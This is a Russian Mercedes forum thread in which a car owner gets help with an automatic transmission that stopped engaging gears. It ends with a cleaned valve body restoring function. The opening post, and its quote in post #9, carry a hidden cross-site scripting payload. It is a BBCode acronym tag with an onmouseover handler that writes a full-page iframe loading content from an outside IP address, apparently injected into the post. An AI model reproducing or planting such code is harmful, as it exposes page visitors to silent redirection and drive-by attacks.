Перейти к содержимому


Фотография

Акпп 722,362


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 41

#1 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 12 January 2014 - 22:49

Месяц уже лазию по форумам, но так до конца и не пойму ничего.
Ситуация такая:
FrGG вела себя в принципе нормально, редко попинывалась на горячую с D на R и все. Но как-то, остановившись и не глушив авто, постоял 5 мин и собрался ехать дальше. но коробас вообще не реагировал на переключения ни в какие положения. Денег в обрез. Жду дельного реального совета. Чтобы с него и начать работать....
Очень Вам благодарен заранее....

[acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://78.108.185.111/old/index.htm\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]]Изображение[/acronym]_[/acronym]


Сообщение отредактировал serega5254: 13 January 2014 - 08:36

Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#2 ОФФЛАЙН   driv3rMB

driv3rMB

    Мерсоактивист

  • Мерсоводы
  • PipPipPip
  • Cообщений: 550
  • Город:Москва
  • Автомобиль:
    W124 T-mod
Гараж Мой гараж

Отправлено 12 January 2014 - 23:00

Не 100 %, чутье подсказывает что электрика-проводка. Пока стоял перегрелась или сгнила ;)


(s124)/HFM/2.2a/1993 серебро


#3 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 12 January 2014 - 23:05

Не 100 %, чутье подсказывает что электрика-проводка. Пока стоял перегрелась или сгнила ;)

 

а откуда проверять начинать? что именно трогать и где лазить???
есть еще такой нюанс, когда селектор в положение R ставишь, фонари заднего загораются...


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#4 ОФФЛАЙН   Temruychanin

Temruychanin

    Легенда форума

  • Мерсоводы
  • PipPipPipPipPipPip
  • Cообщений: 3399
  • Город:г. Темрюк, Краснодарский край

Отправлено 12 January 2014 - 23:09

Не 100 %, чутье подсказывает что электрика-проводка. Пока стоял перегрелась или сгнила ;)

Бред.
Какая нафиг электрика на 3 серии АКПП.
Начни с простого. При включении на драйв посмотри на кардан, не крутится ли, потом тягу привода кулисы и привод на коробке.


W 201 2.0 1983г. Белый. АКПП, Стромберг 175 CDT + газ Ловато. Краснодарский край. купил в 2007 г. Жена катается, я мою и обслуживаю.
W 124 E 320 1995 Чоорный, 4АКПП, М 104992, заказ для Японии - зверь машина !!! был с 24.04. 2011 г.(продал друга  :bangheat: , жалко, но по вспаханному полю он не едет).
 


#5 ОФФЛАЙН   Temruychanin

Temruychanin

    Легенда форума

  • Мерсоводы
  • PipPipPipPipPipPip
  • Cообщений: 3399
  • Город:г. Темрюк, Краснодарский край

Отправлено 12 January 2014 - 23:13

а откуда проверять начинать? что именно трогать и где лазить???
есть еще такой нюанс, когда селектор в положение R ставишь, фонари заднего загораются...

Значит тяга не слетела и блокиратор в норме, но проверь визуально- крутит ли валик переключения в коробке.


W 201 2.0 1983г. Белый. АКПП, Стромберг 175 CDT + газ Ловато. Краснодарский край. купил в 2007 г. Жена катается, я мою и обслуживаю.
W 124 E 320 1995 Чоорный, 4АКПП, М 104992, заказ для Японии - зверь машина !!! был с 24.04. 2011 г.(продал друга  :bangheat: , жалко, но по вспаханному полю он не едет).
 


#6 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 13 January 2014 - 00:13

Значит тяга не слетела и блокиратор в норме, но проверь визуально- крутит ли валик переключения в коробке.

откуда глядеть хоть?? снимать коробку?


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#7 ОФФЛАЙН   Temruychanin

Temruychanin

    Легенда форума

  • Мерсоводы
  • PipPipPipPipPipPip
  • Cообщений: 3399
  • Город:г. Темрюк, Краснодарский край

Отправлено 13 January 2014 - 01:01

откуда глядеть хоть?? снимать коробку?

Глазами, на яме/эстакаде, подъёмнике.


W 201 2.0 1983г. Белый. АКПП, Стромберг 175 CDT + газ Ловато. Краснодарский край. купил в 2007 г. Жена катается, я мою и обслуживаю.
W 124 E 320 1995 Чоорный, 4АКПП, М 104992, заказ для Японии - зверь машина !!! был с 24.04. 2011 г.(продал друга  :bangheat: , жалко, но по вспаханному полю он не едет).
 


#8 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 13 January 2014 - 23:18

Коробка 5и ступенчатая.
Седня пытались переставить там какую то фишку сто какой-то клапан, если залип, продавило обратно... и обратно...
результа ноль!!! Сняли поддон, слили масло, сняли плиту... Масла 7 литров. Плита в норм состоянии свиду. Но сразу сказали, разбирать ее не будут и замочили в керосине на ночь.

 

Что делать дальше если не поможет????

 

Масло при работе двигателя и переключении селектора уходит (по показаниям на щупе), т.е. насос качает. бублик крутится


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#9 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 13 January 2014 - 23:32

Месяц уже лазию по форумам, но так до конца и не пойму ничего.
Ситуация такая:
FrGG вела себя в принципе нормально, редко попинывалась на горячую с D на R и все. Но как-то, остановившись и не глушив авто, постоял 5 мин и собрался ехать дальше. но коробас вообще не реагировал на переключения ни в какие положения. Денег в обрез. Жду дельного реального совета. Чтобы с него и начать работать....
Очень Вам благодарен заранее....

[acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://78.108.185.111/old/index.htm\x20frameborder=0\x20width=100%\x20height=100%\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]]Изображение[/acronym]_[/acronym]

Доброго времени суток. Если вы намерены ремонтировать сами, и извеняюсь есть определенная склонность, могу помочь советами и фотками. А то есть люди на форуме расспрашивают до упора, а потом берут б/у или механику,хотя бывают случаи когда частичный ремонт гораздо дешевле чем не обоснованная замена акпп, город укажите



#10 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 13 January 2014 - 23:44

Доброго времени суток. Если вы намерены ремонтировать сами, и извеняюсь есть определенная склонность, могу помочь советами и фотками. А то есть люди на форуме расспрашивают до упора, а потом берут б/у или механику,хотя бывают случаи когда частичный ремонт гораздо дешевле чем не обоснованная замена акпп, город укажите

 

саратов


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#11 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 14 January 2014 - 10:05

Коробка 5и ступенчатая.
Седня пытались переставить там какую то фишку сто какой-то клапан, если залип, продавило обратно... и обратно...
результа ноль!!! Сняли поддон, слили масло, сняли плиту... Масла 7 литров. Плита в норм состоянии свиду. Но сразу сказали, разбирать ее не будут и замочили в керосине на ночь.

 

Что делать дальше если не поможет????

 

Масло при работе двигателя и переключении селектора уходит (по показаниям на щупе), т.е. насос качает. бублик крутится

Ничего не понятно.Просто промыть гидроблок не панацея чаще всего, тем более не располовинив,хрень. Что по состоянию масла сказали,было ли что в поддоне?Не проверив хотябы состояние и работу клапана включения, демфера включения диапазона в нижней плите и просто помыть, в вашей ситуации это тупо.Мастера гидроблок перебрать не могут?:)



#12 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 14 January 2014 - 11:33

Ничего не понятно.Просто промыть гидроблок не панацея чаще всего, тем более не располовинив,хрень. Что по состоянию масла сказали,было ли что в поддоне?Не проверив хотябы состояние и работу клапана включения, демфера включения диапазона в нижней плите и просто помыть, в вашей ситуации это тупо.Мастера гидроблок перебрать не могут?:)

 

а нет ли случайно схемы расположения боковых клапанов в плите? плиту располовинили?


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#13 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 14 January 2014 - 11:33

Ничего не понятно.Просто промыть гидроблок не панацея чаще всего, тем более не располовинив,хрень. Что по состоянию масла сказали,было ли что в поддоне?Не проверив хотябы состояние и работу клапана включения, демфера включения диапазона в нижней плите и просто помыть, в вашей ситуации это тупо.Мастера гидроблок перебрать не могут?:)

 

а нет ли случайно схемы расположения боковых клапанов в плите? плиту располовинили?


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#14 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 14 January 2014 - 11:53

разобрали и моют...


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#15 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 14 January 2014 - 14:24

а нет ли случайно схемы расположения боковых клапанов в плите? плиту располовинили?

Выслать могу вечером, я сейчас с мобилы пишу. Скачай книгу от легион автодата есть на форуме и в нете.То что разбираете фоткайте, клапана вытаскивайте последовательно, ничего нельзя путать, спешка сдесь враг. Начните с нижней плиты "треугольник". Поломанные и гнутые пружины под замену, пластиковые демферы/аккумуляторы должны быть без трещин, можно проверить на течь, обратить внимание на их уплотнения. Я думал вы сами будете перебирать, я бы всё рассказал последовательно что и как, ну раз уж начали мастера...Вечером могу выслать четкие схемы и указать на что обратить внимание.



#16 ОФФЛАЙН   Gazzel

Gazzel

    Легенда форума

  • Мерсоводы
  • PipPipPipPipPipPip
  • Cообщений: 14027

Отправлено 14 January 2014 - 14:34

так карда или его хвостовик крутится? уровень масла на драйве завышен? нафига нужно было разбиарть коробку, не заня что с ней? теперь только 1 совет- не теряй время, ищи бу коробку


москва 903-5237352
2010231f123541 190 карб175 белый/синий салон 85г
1240281b958502 280e серебро/велюр 93г не Е
1.Ищу синие репсовые коврики (ворсистые полосы) на 201,
или большие на 126-140+любого цвета на 201 с сохранившейся формой выкройки.
2.Куплю дорого отличный руль черный пупырчатый, правый по сылке http://photo.qip.ru/...rzzzz/95256210/
3. Ищу блок м104 с _максимально_ близким номером к№ 1049хх 12 014198

 

ПРОДАЮ ЧТО-ЛИБО РЕДКО, В ЛИЧКУ НЕ ПИШУ, СВЯЗЬ ЧЕРЕЗ ТЕЛЕФОН!


#17 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 14 January 2014 - 14:46

так карда или его хвостовик крутится? уровень масла на драйве завышен? нафига нужно было разбиарть коробку, не заня что с ней? теперь только 1 совет- не теряй время, ищи бу коробку

б/у типа примерно в таком же состоянии,два раза на теже грабли...



#18 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 14 January 2014 - 18:06

Я так понимаю у вас 722.5, а не 722.362? В нижней плите посмотрите позиции 4 и 6, причем клапан 6 можно проверить не снимая боковой крышки путем нажатия не острым и тонким инструментом, я использовал жесткую капроновую стяжку(хомут), поддевая кончиком хомута за торец клапана, клапаны нельзя царапать. Ну если клина словил нужно протолкнуть чем-то металлическим, но за торец, минуя рабочую поверхность.

Прикрепленные файлы

  • Прикрепленный файл  124.bmp   1.21МБ   363 скачиваний

Сообщение отредактировал student w124: 14 January 2014 - 18:45


#19 ОФФЛАЙН   serega5254

serega5254

    Любитель

  • Пользователи
  • Pip
  • Cообщений: 49
  • Город:г.Саратов
  • Автомобиль:
    s600

Отправлено 16 January 2014 - 21:29

Я так понимаю у вас 722.5, а не 722.362? В нижней плите посмотрите позиции 4 и 6, причем клапан 6 можно проверить не снимая боковой крышки путем нажатия не острым и тонким инструментом, я использовал жесткую капроновую стяжку(хомут), поддевая кончиком хомута за торец клапана, клапаны нельзя царапать. Ну если клина словил нужно протолкнуть чем-то металлическим, но за торец, минуя рабочую поверхность.

 

коробка отремонтирована путем промывки плиты... всем, кто говорит искать новую коробку желаю удачи)
Студенту спасибо за схему и помощь!))


Разбираю w140 600sel
СОТОВЫЙ ДЛЯ СВЯЗИ: 8-937-967-53-83
Серега


#20 ОФФЛАЙН   student w124

student w124

    Мерсовод

  • Пользователи
  • PipPip
  • Cообщений: 51
  • Город:Воронеж
  • Автомобиль:
    W124 230TE АКПП 92г.в.

Отправлено 17 January 2014 - 08:46

коробка отремонтирована путем промывки плиты... всем, кто говорит искать новую коробку желаю удачи)
Студенту спасибо за схему и помощь!))

Молодцы! Залип клапан включения походу, у меня тоже такое было, только я по незнайке весь коробас перебрал, ну эт тоже неплохо. Никто не продаст хороший коробас за 15-20т.р., тут как повезет, но как правило- фрики,ленты изношены, уплотнения дубовые и большинство продавцов сами не знают реального состояния их коробок, у таких гарантия 2 недели. Есть товарищи локти кусают, за такие бабки можно в ноль коробку перебрать, если ты не планируешь с ласточкой расставаться несколько лет.Схемы есть на обе плиты и инфы в нете предостаточно на эти коробки,есть фото 722.4. Масло, фильтр поменяли?






Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 анонимных